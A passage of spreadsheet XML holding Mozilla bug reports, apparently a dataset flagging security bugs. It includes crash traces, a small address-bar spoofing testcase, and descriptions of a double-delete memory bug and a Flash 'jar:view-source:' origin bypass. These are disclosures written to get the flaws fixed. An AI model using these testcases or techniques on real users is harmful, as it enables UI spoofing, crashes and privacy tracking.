          <t>P1</t>
        </is>
      </c>
      <c r="R3733" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3733" t="inlineStr">
        <is>
          <t>psm2.1</t>
        </is>
      </c>
      <c r="T3733" t="n">
        <v>1</v>
      </c>
      <c r="U3733" t="n">
        <v>0</v>
      </c>
      <c r="V3733" t="n">
        <v>25</v>
      </c>
      <c r="W3733" t="inlineStr">
        <is>
          <t>The fix for bug 44042, specifically, the change to the beginning of
nsNSSDialogs::ConfirmDialog, caused a topcrash with the following stack:
         nsPrefBranch::QueryObserver   
[d:\builds\seamonkey\mozilla\modules\libpref\src\nsPrefBranch.cpp  line 697]
         nsPrefBranch::GetBoolPref     
[d:\builds\seamonkey\mozilla\modules\libpref\src\nsPrefBranch.cpp  line 174]
         nsPrefService::GetBoolPref    
[d:\builds\seamonkey\mozilla\modules\libpref\src\nsPrefService.h  line 42]
         nsPref::GetBoolPref   
[d:\builds\seamonkey\mozilla\modules\libpref\src\nsPref.cpp  line 194]
         nsNSSDialogs::ConfirmDialog   
[d:\builds\seamonkey\mozilla\security\manager\pki\src\nsNSSDialogs.cpp  line 578]
         nsNSSDialogs::ConfirmPostToInsecureFromSecure 
[d:\builds\seamonkey\mozilla\security\manager\pki\src\nsNSSDialogs.cpp  line 563]
         nsSecureBrowserUIImpl::ConfirmPostToInsecureFromSecure
[d:\builds\seamonkey\mozilla\security\manager\ssl\src\nsSecureBrowserUIImpl.cpp
 line 819]
         nsSecureBrowserUIImpl::CheckPost      
[d:\builds\seamonkey\mozilla\security\manager\ssl\src\nsSecureBrowserUIImpl.cpp
 line 611]
         nsSecureBrowserUIImpl::Notify 
[d:\builds\seamonkey\mozilla\security\manager\ssl\src\nsSecureBrowserUIImpl.cpp
 line 261]
         nsFormFrame::OnSubmit 
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsFormFrame.cpp  line 874]
...
The null check for prefName was needed because of
ConfirmPostToInsecureFromSecure, which passes a pref name of |nsnull| with the
comment "No preference for this one - it's too important".  I think the simple
fix for this would be to revert that +5/-5 change.
This is the #1 not-yet-fixed topcrash on the trunk for the period 8-22 to 8-24.</t>
        </is>
      </c>
      <c r="X3733" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3734">
      <c r="A3734" t="n">
        <v>835499</v>
      </c>
      <c r="B3734" t="inlineStr">
        <is>
          <t>2013-01-28 12:07:15 -0800</t>
        </is>
      </c>
      <c r="C3734" t="inlineStr">
        <is>
          <t>Crash [@ js::ion::IonFrameIterator::ionScript] or [@ js::ion::GetPcScript] or Assertion failure: type() == IonFrame_OptimizedJS, at ion/IonFrames.cpp:855</t>
        </is>
      </c>
      <c r="D3734" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:09 -0800</t>
        </is>
      </c>
      <c r="E3734" t="n">
        <v>1</v>
      </c>
      <c r="F3734" t="n">
        <v>1</v>
      </c>
      <c r="G3734" t="n">
        <v>3</v>
      </c>
      <c r="H3734" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3734" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3734" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3734" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3734" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3734" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3734" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3734" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main20+]</t>
        </is>
      </c>
      <c r="Q3734" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3734" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3734" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T3734" t="n">
        <v>1</v>
      </c>
      <c r="U3734" t="n">
        <v>0</v>
      </c>
      <c r="V3734" t="n">
        <v>17</v>
      </c>
      <c r="W3734" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 80fed51ae074 (run with --ion-eager):
new Function("\
actual = Array.indexOf([]);\
actual = [].indexOf();\
actual += Array.indexOf(actual);\
")();</t>
        </is>
      </c>
      <c r="X3734" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3735">
      <c r="A3735" t="n">
        <v>1553681</v>
      </c>
      <c r="B3735" t="inlineStr">
        <is>
          <t>2019-05-22 16:10:11 -0700</t>
        </is>
      </c>
      <c r="C3735" t="inlineStr">
        <is>
          <t>Reundant confirmation dialog for reloading the page</t>
        </is>
      </c>
      <c r="D3735" t="inlineStr">
        <is>
          <t>2019-11-15 15:08:06 -0800</t>
        </is>
      </c>
      <c r="E3735" t="n">
        <v>1</v>
      </c>
      <c r="F3735" t="n">
        <v>1</v>
      </c>
      <c r="G3735" t="n">
        <v>7</v>
      </c>
      <c r="H3735" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3735" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3735" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K3735" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3735" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3735" t="inlineStr">
        <is>
          <t>[lang=js]</t>
        </is>
      </c>
      <c r="Q3735" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3735" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3735" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3735" t="n">
        <v>1</v>
      </c>
      <c r="U3735" t="n">
        <v>0</v>
      </c>
      <c r="V3735" t="n">
        <v>16</v>
      </c>
      <c r="W3735" t="inlineStr">
        <is>
          <t>**STR:**
1. Have a Treeherder page open.
2. Wait for a site update, which causes a blue header bar to appear that says something like "Reload to update the page", with a red "Reload" button.
3. Click the red "Reload" button.
**Actual results:**
I get a dialog asking if I want to reload the page.
**Expected results:**
I think my intentions are pretty clear when I press the red "Reload" button; no need for a dialog.</t>
        </is>
      </c>
      <c r="X3735" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3736">
      <c r="A3736" t="n">
        <v>960146</v>
      </c>
      <c r="B3736" t="inlineStr">
        <is>
          <t>2014-01-15 09:40:31 -0800</t>
        </is>
      </c>
      <c r="C3736" t="inlineStr">
        <is>
          <t>Preventing scrolling also prevents re-showing hidden address bar</t>
        </is>
      </c>
      <c r="D3736" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:05 -0700</t>
        </is>
      </c>
      <c r="E3736" t="n">
        <v>1</v>
      </c>
      <c r="F3736" t="n">
        <v>1</v>
      </c>
      <c r="G3736" t="n">
        <v>6</v>
      </c>
      <c r="H3736" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3736" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3736" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3736" t="inlineStr">
        <is>
          <t>27 Branch</t>
        </is>
      </c>
      <c r="L3736" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3736" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3736" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3736" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q3736" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3736" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3736" t="inlineStr">
        <is>
          <t>Firefox 30</t>
        </is>
      </c>
      <c r="T3736" t="n">
        <v>1</v>
      </c>
      <c r="U3736" t="n">
        <v>0</v>
      </c>
      <c r="V3736" t="n">
        <v>62</v>
      </c>
      <c r="W3736" t="inlineStr">
        <is>
          <t>After the address bar on Android has been hidden (by scrolling down), calling preventDefault on touchstart and DOMMouseScroll events prevents the user from making it visible again. It should prevent scrolling the content but it should still always be possible to reliably make the address bar visible.
As a result of this bug, it would currently be fairly trivial to spoof the browser UI without the user ever realizing it.
Tested on Android 4.3.0; HTC One Build/JJS15J, Firefox 26.01 and 27.0 beta
Test case:
&lt;!DOCTYPE html&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
&lt;body style="height: 10000px;"&gt;
    Scroll down until the address bar disappears, then tap on the page.
&lt;/body&gt;
&lt;script&gt;
    var prevent = false;
    document.body.onclick = function () { prevent = true; };
    window.addEventListener('DOMMouseScroll', function (e) {
        e.preventDefault();
    });
    document.ontouchstart = function (e) {
        if (prevent) e.preventDefault();
    };
&lt;/script&gt;
Workaround:
If your device happens to have a menu button, pressing it will always show the address bar. Not all devices have the button though.</t>
        </is>
      </c>
      <c r="X3736" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3737">
      <c r="A3737" t="n">
        <v>870870</v>
      </c>
      <c r="B3737" t="inlineStr">
        <is>
          <t>2013-05-10 10:14:52 -0700</t>
        </is>
      </c>
      <c r="C3737" t="inlineStr">
        <is>
          <t>FHR accepts events from untrusted domains</t>
        </is>
      </c>
      <c r="D3737" t="inlineStr">
        <is>
          <t>2018-10-11 13:43:22 -0700</t>
        </is>
      </c>
      <c r="E3737" t="n">
        <v>1</v>
      </c>
      <c r="F3737" t="n">
        <v>1</v>
      </c>
      <c r="G3737" t="n">
        <v>6</v>
      </c>
      <c r="H3737" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3737" t="inlineStr">
        <is>
          <t>Firefox Health Report Graveyard</t>
        </is>
      </c>
      <c r="J3737" t="inlineStr">
        <is>
          <t>Client: Desktop</t>
        </is>
      </c>
      <c r="K3737" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3737" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3737" t="inlineStr">
        <is>
          <t>[csec-other] [csec-priv-escalation][post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q3737" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3737" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3737" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T3737" t="n">
        <v>1</v>
      </c>
      <c r="U3737" t="n">
        <v>0</v>
      </c>
      <c r="V3737" t="n">
        <v>26</v>
      </c>
      <c r="W3737" t="inlineStr">
        <is>
          <t>Created attachment 748043
PoC
Issue:
Firefox Health Report accepts DisableDataSubmission, EnableDataSubmission, RequestCurrentPrefs and RequestCurrentPayload events from any content document present in the remote-report iframe. This allows malicious content to change a users' sharing preferences.
Remediation:
An origin check should be performed in handleRemoteCommand. We could also check that the event is handling user input (where applicable).</t>
        </is>
      </c>
      <c r="X3737" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3738">
      <c r="A3738" t="n">
        <v>645565</v>
      </c>
      <c r="B3738" t="inlineStr">
        <is>
          <t>2011-03-27 15:49:32 -0700</t>
        </is>
      </c>
      <c r="C3738" t="inlineStr">
        <is>
          <t>Crash due to double-delete in nsDirIndexParser</t>
        </is>
      </c>
      <c r="D3738" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:14 -0700</t>
        </is>
      </c>
      <c r="E3738" t="n">
        <v>1</v>
      </c>
      <c r="F3738" t="n">
        <v>1</v>
      </c>
      <c r="G3738" t="n">
        <v>3</v>
      </c>
      <c r="H3738" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3738" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3738" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3738" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3738" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3738" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3738" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3738" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3738" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3738" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T3738" t="n">
        <v>1</v>
      </c>
      <c r="U3738" t="n">
        <v>0</v>
      </c>
      <c r="V3738" t="n">
        <v>12</v>
      </c>
      <c r="W3738" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16
Build Identifier: 3.6.16
By passing a malformed "application/http-index-format" response it is possible to cause a double delete in nsDirIndexParser leading to application crash and potential arbitrary code execution.
Details:
(All code below is from netwerk/streamconv/converters/nsDirIndexParser.cpp)
The nsDirIndexParser destructor deletes the member mFormat:
    101 nsDirIndexParser::~nsDirIndexParser() {
    102   delete[] mFormat;
    ...
This is usually fine as mFormat is either null (as it is initalised in the Init method) or a value which has been return by new in the method ParseFormat (line 206):
    178 nsDirIndexParser::ParseFormat(const char* aFormatStr) {
    179   // Parse a "200" format line, and remember the fields and their
    180   // ordering in mFormat. Multiple 200 lines stomp on each other.
    181 
    182   delete[] mFormat;
    183 
    184   // Lets find out how many elements we have.
    185   // easier to do this then realloc
    186   const char* pos = aFormatStr;
    187   unsigned int num = 0;
    188   do {
    189     while (*pos &amp;&amp; nsCRT::IsAsciiSpace(PRUnichar(*pos)))
    190       ++pos;
    191     
    192     ++num;
    193     // There are a maximum of six allowed header fields (doubled plus
    194     // terminator, just in case) -- Bug 443299
    195     if (num &gt; (2 * NS_ARRAY_LENGTH(gFieldTable)))
    196       return NS_ERROR_UNEXPECTED;
    197 
    198     if (! *pos)
    199       break;
    200 
    201     while (*pos &amp;&amp; !nsCRT::IsAsciiSpace(PRUnichar(*pos)))
    202       ++pos;
    203 
    204   } while (*pos);
    205 
    206   mFormat = new int[num+1];
mFormat is deleted on entry to this function on line 182.
By passing a correct 200: line (with num &lt; 14), mFormat will be assigned the value returned by new on line 206. If another 200: line is encountered, mFormat will be deleted on 182 but not set to null. If this second 200: line has an incorrect number of header fields it will fail the check on line 195 and an error value will be return, with mFormat retaining the value which was just deleted.
When this instance of nsDirIndexParser is destroyed the destructor will be called, deleting the same mFormat which has already been deleted, leading potentially to a crash or arbitrary code execution.
*******
A simple patch would be to set mFormat to null after it is deleted on line 182.
This issue appears to have been introduced by the fix for Bug 443299 which limited the number of header fields.
**************
I'll attach a simple python script which will generate the required "application/http-index-format" response (based on the PoC for Bug 443299)
Due to the nature of double delete bugs it may not crash every time and may crash with many different stack traces. I am able to reliably crash firefox here (sometimes having to mash f5 a bit, sometimes not.)
I've only tested on FF 3.6.16 32 bit Ubuntu 10.10.
Reproducible: Always
Steps to Reproduce:
Run attached python script
navigate to localhost:8080
crash. (try with different tabs open etc to get different traces)</t>
        </is>
      </c>
      <c r="X3738" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3739">
      <c r="A3739" t="n">
        <v>481342</v>
      </c>
      <c r="B3739" t="inlineStr">
        <is>
          <t>2009-03-03 20:52:22 -0800</t>
        </is>
      </c>
      <c r="C3739" t="inlineStr">
        <is>
          <t>Adobe Flash loaded from view-source: protocol - network security policy bypass and localhost LSO reading/writing</t>
        </is>
      </c>
      <c r="D3739" t="inlineStr">
        <is>
          <t>2015-07-08 05:10:37 -0700</t>
        </is>
      </c>
      <c r="E3739" t="n">
        <v>1</v>
      </c>
      <c r="F3739" t="n">
        <v>1</v>
      </c>
      <c r="G3739" t="n">
        <v>3</v>
      </c>
      <c r="H3739" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3739" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3739" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3739" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3739" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3739" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3739" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3739" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3739" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3739" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3739" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3739" t="n">
        <v>1</v>
      </c>
      <c r="U3739" t="n">
        <v>0</v>
      </c>
      <c r="V3739" t="n">
        <v>27</v>
      </c>
      <c r="W3739" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
The following was sent to Adobe PSIRT (psirt@adobe.com):
*Overview*
When a Flash file is loaded in Mozilla Firefox from within the
'view-source:' protocol handler, the Adobe Flash plugin miscalculates
the origin of the content. To the plugin, it appears the content was
loaded from the local file system.
This introduces two specific security weaknesses:
    * bypass of 'crossdomain.xml' and access to arbitrary third-party
      web content
    * ability to read and write local shared objects within the
      context of localhost
*Background*
In Mozilla Firefox, it isn't normally possible to render content using
the 'view-source:' pseudo protocol handler. However, by providing the
content as a valid JAR file, the 'jar:' handler can be used to load a
file as HTML from within the context of 'view-source:'. 
This sequence would appear as:
    jar:view-source:http://example.com/data.jar!/page.html
where 'data.jar' would contain:
    * page.html
    * content.swf
The 'page.html' file would include 'content.swf' within an embed tag and
the Flash content would be loaded with a root path of
'view-source:http://example.com/data.jar!/content.swf'.
*Summary*
The Flash security policy restricts objects from accessing third-party
web content unless the third-party site opts in via a
'crossdomain.xml' file. For content that is loaded from the local file
system, no network access is allowed unless a user specifically allows
it by adding a security exception. But, by default, local Flash
objects can load any other local file system content.
Because Flash believes that any content loaded from 'view-source:'
originated on the local machine, the Flash standard network security
policy is not applied. The standard 'crossdomain.xml' file is not
consulted. Mozilla Firefox allows access to the third-party data
because both sets of content originate on the network.
When a Flash object is loaded from within the 'view-source:' protocol,
the content is created within the context of the 'localhost'
hostname. This allows for the creation of Local Shared Object (LSO)
that appears to originate from the localhost.
Since the local networking restrictions can be circumvented by
resubmitting the content using a 'view-source:' URL, coordinating
third-party sites can read and write locally shared objects as well as
post the information back. In this way, a complete privacy compromise
and user tracking is possible.
*Details*
Additional details and demonstrations are available at 
http://pseudo-flaw.net/v/view-source-flash-issues/
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3739" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3740">
      <c r="A3740" t="n">
        <v>873073</v>
      </c>
      <c r="B3740" t="inlineStr">
        <is>
          <t>2013-05-16 08:07:40 -0700</t>
        </is>
      </c>
      <c r="C3740" t="inlineStr">
        <is>
          <t>nsNativeThemeWin seems to spin event loop during layout</t>
        </is>
      </c>
      <c r="D3740" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:47 -0800</t>
        </is>
      </c>
      <c r="E3740" t="n">
        <v>1</v>
      </c>
      <c r="F3740" t="n">
        <v>1</v>
      </c>
      <c r="G3740" t="n">
        <v>3</v>
      </c>
      <c r="H3740" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3740" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3740" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K3740" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3740" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3740" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3740" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3740" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q3740" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3740" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3740" t="n">
        <v>1</v>
      </c>
      <c r="U3740" t="n">
        <v>0</v>
      </c>
      <c r="V3740" t="n">
        <v>37</v>
      </c>
      <c r="W3740" t="inlineStr">
        <is>
          <t>This is what causes Bug 748156.
07:01:45     INFO -  ###!!! ASSERTION: This is unsafe! Fix the caller!: 'Error', file e:/builds/moz2_slave/m-cen-w32-d-000000000000000000/build/content/events/src/nsEventDispatcher.cpp, line 494
07:01:45     INFO -  nsEventDispatcher::DispatchDOMEvent(nsISupports *,nsEvent *,nsIDOMEvent *,nsPresContext *,nsEventStatus *) [content/events/src/nsEventDispatcher.cpp:692]
07:01:45     INFO -  nsGlobalWindow::DispatchEvent(nsIDOMEvent *,bool *) [dom/base/nsGlobalWindow.cpp:7928]
07:01:45     INFO -  nsGlobalWindow::DispatchEvent(nsIDOMEvent *,bool *) [dom/base/nsGlobalWindow.cpp:7909]
07:01:45     INFO -  nsContentUtils::DispatchEvent(nsIDocument *,nsISupports *,nsAString_internal const &amp;,bool,bool,bool,bool *) [content/base/src/nsContentUtils.cpp:3532]
07:01:45     INFO -  nsContentUtils::DispatchTrustedEvent(nsIDocument *,nsISupports *,nsAString_internal const &amp;,bool,bool,bool *) [content/base/src/nsContentUtils.cpp:3503]
07:01:45     INFO -  nsFocusManager::WindowLowered(nsIDOMWindow *) [dom/base/nsFocusManager.cpp:766]
07:01:45     INFO -  nsWebShellWindow::WindowDeactivated() [xpfe/appshell/src/nsWebShellWindow.cpp:418]
07:01:45     INFO -  nsWindow::DispatchFocusToTopLevelWindow(bool) [widget/windows/nsWindow.cpp:4080]
07:01:45     INFO -  nsWindow::ProcessMessage(unsigned int,unsigned int &amp;,long &amp;,long *) [widget/windows/nsWindow.cpp:5177]
07:01:45     INFO -  nsWindow::WindowProcInternal(HWND__ *,unsigned int,unsigned int,long) [widget/windows/nsWindow.cpp:4390]
07:01:45     INFO -  CallWindowProcCrashProtected [xpcom/base/nsCrashOnException.cpp:32]
07:01:45     INFO -  nsWindow::WindowProc(HWND__ *,unsigned int,unsigned int,long) [widget/windows/nsWindow.cpp:4342]
07:01:45     INFO -  USER32 + 0x186ef
07:01:45     INFO -  USER32 + 0x18876
07:01:45     INFO -  USER32 + 0x170f4
07:01:45     INFO -  USER32 + 0x1738f
07:01:45     INFO -  ntdll + 0x4642e
07:01:45     INFO -  USER32 + 0x17308
07:01:45     INFO -  USER32 + 0x1729f
07:01:45     INFO -  USER32 + 0xbf96
07:01:45     INFO -  USER32 + 0x1738f
07:01:45     INFO -  ntdll + 0x4642e
07:01:45     INFO -  QueryForButtonData [widget/windows/nsNativeThemeWin.cpp:119]
07:01:45     INFO -  nsIFrame::AddCSSMinSize(nsBoxLayoutState &amp;,nsIFrame *,nsSize &amp;,bool &amp;,bool &amp;) [layout/xul/base/src/nsBox.cpp:690]
07:01:45     INFO -  nsBoxFrame::GetMinSize(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:816]
07:01:45     INFO -  nsBoxFrame::GetPrefSize(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:768]
07:01:45     INFO -  nsSprocketLayout::GetPrefSize(nsIFrame *,nsBoxLayoutState &amp;) [layout/xul/base/src/nsSprocketLayout.cpp:1320]
07:01:45     INFO -  nsBoxFrame::GetPrefSize(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:757]
07:01:45     INFO -  nsSprocketLayout::GetPrefSize(nsIFrame *,nsBoxLayoutState &amp;) [layout/xul/base/src/nsSprocketLayout.cpp:1320]
07:01:45     INFO -  nsBoxFrame::GetPrefSize(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:757]
07:01:45     INFO -  nsSprocketLayout::GetPrefSize(nsIFrame *,nsBoxLayoutState &amp;) [layout/xul/base/src/nsSprocketLayout.cpp:1320]
07:01:45     INFO -  nsBoxFrame::GetPrefSize(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:757]
07:01:45     INFO -  nsSprocketLayout::PopulateBoxSizes(nsIFrame *,nsBoxLayoutState &amp;,nsBoxSize * &amp;,int &amp;,int &amp;,int &amp;) [layout/xul/base/src/nsSprocketLayout.cpp:738]
07:01:45     INFO -  nsSprocketLayout::Layout(nsIFrame *,nsBoxLayoutState &amp;) [layout/xul/base/src/nsSprocketLayout.cpp:221]
07:01:45     INFO -  nsBoxFrame::DoLayout(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:899]
07:01:45     INFO -  nsIFrame::Layout(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBox.cpp:512]
07:01:45     INFO -  nsStackLayout::Layout(nsIFrame *,nsBoxLayoutState &amp;) [layout/xul/base/src/nsStackLayout.cpp:343]
07:01:45     INFO -  nsBoxFrame::DoLayout(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBoxFrame.cpp:899]
07:01:45     INFO -  nsIFrame::Layout(nsBoxLayoutState &amp;) [layout/xul/base/src/nsBox.cpp:512]
07:01:45     INFO -  nsBoxFrame::Reflow(nsPresContext *,nsHTMLReflowMetrics &amp;,nsHTMLReflowState const &amp;,unsigned int &amp;) [layout/xul/base/src/nsBoxFrame.cpp:703]
07:01:45     INFO -  nsContainerFrame::ReflowChild(nsIFrame *,nsPresContext *,nsHTMLReflowMetrics &amp;,nsHTMLReflowState const &amp;,int,int,unsigned int,unsigned int &amp;,nsOverflowContinuationTracker *) [layout/generic/nsContainerFrame.cpp:971]
07:01:45     INFO -  ViewportFrame::Reflow(nsPresContext *,nsHTMLReflowMetrics &amp;,nsHTMLReflowState const &amp;,unsigned int &amp;) [layout/generic/nsViewportFrame.cpp:226]
07:01:45     INFO -  PresShell::ProcessReflowCommands(bool) [layout/base/nsPresShell.cpp:7929]
07:01:45     INFO -  PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) [layout/base/nsPresShell.cpp:3891]
07:01:45     INFO -  nsRefreshDriver::Tick(__int64,mozilla::TimeStamp) [layout/base/nsRefreshDriver.cpp:962]
07:01:45     INFO -  mozilla::RefreshDriverTimer::TickDriver(nsRefreshDriver *,__int64,mozilla::TimeStamp) [layout/base/nsRefreshDriver.cpp:168]
07:01:45     INFO -  mozilla::RefreshDriverTimer::Tick() [layout/base/nsRefreshDriver.cpp:159]
07:01:45     INFO -  nsTimerImpl::Fire() [xpcom/threads/nsTimerImpl.cpp:547]
07:01:45     INFO -  nsTimerEvent::Run() [xpcom/threads/nsTimerImpl.cpp:636]
07:01:45     INFO -  nsThread::ProcessNextEvent(bool,bool *) [xpcom/threads/nsThread.cpp:627]</t>
        </is>
      </c>
      <c r="X3740" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3741">
      <c r="A3741" t="n">
        <v>1205163</v>
      </c>
      <c r="B3741" t="inlineStr">
        <is>
          <t>2015-09-15 20:55:56 -0700</t>
        </is>
      </c>
      <c r="C3741" t="inlineStr">
        <is>
          <t>&lt;xsl:output method="text"/&gt; triggers an assertion in debug builds.</t>
        </is>
      </c>
      <c r="D3741" t="inlineStr">
        <is>
          <t>2017-01-16 03:01:08 -0800</t>
        </is>
      </c>
      <c r="E3741" t="n">
        <v>1</v>
      </c>
      <c r="F3741" t="n">
        <v>1</v>
      </c>
      <c r="G3741" t="n">
        <v>3</v>
      </c>
      <c r="H3741" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3741" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3741" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
